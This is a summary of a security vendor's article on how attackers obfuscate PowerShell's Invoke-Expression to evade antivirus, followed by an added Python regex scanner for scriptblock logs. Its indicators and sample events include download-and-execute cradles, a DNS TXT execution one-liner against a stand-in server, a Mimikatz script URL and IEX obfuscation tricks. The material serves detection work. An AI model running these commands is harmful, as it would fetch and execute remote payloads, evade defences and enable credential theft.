Keypoints
- IEX (Invoke-Expression) is commonly used to evaluate and execute code in PowerShell and is frequently targeted by attackers to launch payloads.
- Attackers obfuscate IEX using methods such as splitting strings, character substitution (including [char] integer values), and reordering format strings to evade detection.
- Variable extraction techniques pull I, E, X from reliable system variables ($PSHome, $env:COMSPEC, $ShellID) or from Get-Variable results (e.g., MaximumDriveCount) to assemble “IEX”.
- “Globfuscation” leverages Get-Alias or Get-Command with wildcard patterns (e.g., (gal ?e[?x])) to extract the alias “iex”.
- Remote retrieval techniques include downloading scripts via web (obfuscated raw.githubusercontent URL for Invoke-Mimikatz) or invoking code from DNS TXT records using nslookup and PowerShell.
- Payloads may be XOR-encoded and executed after assembly; these obfuscation methods can bypass AV/AMSI and run on patched Windows hosts.
- Detection guidance: enable PowerShell scriptblock logging (EVID 4104), use the provided Securonix Spotter queries, and apply listed Securonix detection policies.
MITRE Techniques
- [T1027] Obfuscated Files or Information – Obfuscation used to hide IEX and payloads; quote: ‘obfuscation is a useful tool to help them achieve this. It is an effective way to bypass signature detection as it randomizes malicious strings.’
- [T1140] Deobfuscate/Decode Files or Information – Attackers encode payloads (e.g., XOR) and then decode at execution; quote: ‘The IEX command is then used to execute the second half of the command which is XOR encoded.’
- [T1059.001] Command and Scripting Interpreter: PowerShell – IEX is used to execute downloaded or assembled PowerShell code; quote: ‘Invoke expressions (IEX) in PowerShell are a common method of executing code.’
Indicators of Compromise
- [Domain] remote/script hosting used for payload delivery – hxxps://raw.githubusercontent[.]com/maliciousness/Invoke-Mimikatz.ps1 (obfuscated example), remote.dns.server (DNS TXT C2)
- [File name] downloaded/executed script – Invoke-Mimikatz.ps1 used in examples to deliver Mimikatz functionality
- [Command pattern] PowerShell / DNS invocation examples – IEX(New-Object Net.WebClient).DownloadString(…), & powershell .(nslookup -q=txt remote.dns.server)[-1]
- [PowerShell variables] environment/variable extraction used to assemble IEX – $PSHome, $env:COMSPEC, $ShellID, and MaximumDriveCount used to extract characters
PowerShell’s Invoke-Expression (IEX) evaluates strings or variables as code; attackers use it to execute local or remote payloads (example: IEX(New-Object Net.WebClient).DownloadString(…)) and to pipe downloaded content into IEX. There are two common invocation styles: calling IEX(…) directly, or piping an evaluated command into IEX at the end, so detection should inspect both patterns in scriptblock logs (EVID 4104) and process command lines.
Multiple obfuscation techniques are used to conceal IEX: simple string splitting or joining of characters; character substitution via [char] integer values; extracting I/E/X characters from environment or PowerShell variables ($PSHome, $env:COMSPEC, $ShellID) or Get-Variable results (e.g., MaximumDriveCount). Globfuscation uses Get-Alias or Get-Command with wildcards (e.g., (gal ?e[?x]) or (gcm ?e[?x])) to match and extract ‘iex’. Reordering uses format strings and the -f operator to assemble characters in non-linear order. Attackers may also retrieve executable text from DNS TXT records (e.g., & powershell .(nslookup -q=txt remote.dns.server)[-1]) and execute XOR-encoded payloads that are decoded at runtime.
For detection, enable PowerShell scriptblock logging (EVID 4104) and look for patterns such as indexed extractions ($pshome[), [char] or [char[]] with -join, .(gal / Get-Alias) wildcard patterns that match ‘?e[?x]’, Get-Variable with .name[3,11,2] and -join, format string usage with -f and ‘}{0}’ patterns, and nslookup -q=txt with [-1]. The article provides Securonix Spotter queries and detection policy IDs to operationalize these indicators in SIEM/SOAR workflows.
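The indicator patterns from the detection guidance above, turned into a small scanner that can be run over ScriptBlockText values exported from EVID 4104 events. This is an added example, not code from the Securonix post; the rule names, the regexes and the sample events are my own constructions, with placeholder indices and hostnames.

```python
import re
from typing import Dict, List

# Each rule is a list of regexes that must ALL match the scriptblock text
# (case-insensitive) for the rule to fire. The patterns are the indicators
# listed in the detection guidance: indexed $PSHome extraction, [char]/[char[]]
# with -join, alias/command globbing for '?e[?x]', Get-Variable name indexing
# with -join, -f format-string reordering, and nslookup TXT retrieval with [-1].
RULES: Dict[str, List[str]] = {
    "direct_iex":        [r"\b(iex|invoke-expression)\b"],
    "pshome_index":      [r"\$pshome\["],
    "char_join":         [r"\[char(\[\])?\]", r"-join"],
    "alias_glob":        [r"\b(gal|get-alias|gcm|get-command)\b\s*\?e\[\?x\]"],
    "getvariable_index": [r"get-variable", r"\.name\[3,11,2\]", r"-join"],
    "format_reorder":    [r"\}\{0\}", r"\s-f\s"],
    "dns_txt_exec":      [r"nslookup\s+-q=txt", r"\[-1\]"],
}
COMPILED = {name: [re.compile(p, re.IGNORECASE) for p in pats]
            for name, pats in RULES.items()}

def match_rules(scriptblock: str) -> List[str]:
    """Return the names of every rule whose regexes all match the text."""
    return [name for name, pats in COMPILED.items()
            if all(p.search(scriptblock) for p in pats)]

def scan(events: List[str]) -> Dict[int, List[str]]:
    """Map each event index to the rules it triggered; clean events are omitted."""
    hits: Dict[int, List[str]] = {}
    for i, text in enumerate(events):
        rules = match_rules(text)
        if rules:
            hits[i] = rules
    return hits

# Constructed sample ScriptBlockText values (not real log captures); the last
# two are benign lines that should not fire any rule.
SAMPLE_EVENTS = [
    "IEX(New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')",
    "$pshome[4]+$pshome[30]+'x'",
    "-join([char[]](73,69,88))",
    ".(gal ?e[?x]) 'Get-Date'",
    "(Get-Variable *MaximumDriveCount*).name[3,11,2] -join ''",
    "('{1}{0}{2}' -f 'e','i','x')",
    "& powershell .(nslookup -q=txt remote.dns.server)[-1]",
    "Get-ChildItem -Path C:\\Temp | Where-Object Name -like '*.log'",
    "$parts -join ','",
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)} :: {SAMPLE_EVENTS[idx]}")
```

Each rule requires every listed regex, so a legitimate `-join` on its own does not fire; tune the rule lists against your own baseline before turning them into SIEM alerts.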
Read more: https://www.securonix.com/blog/hiding-the-powershell-execution-flow/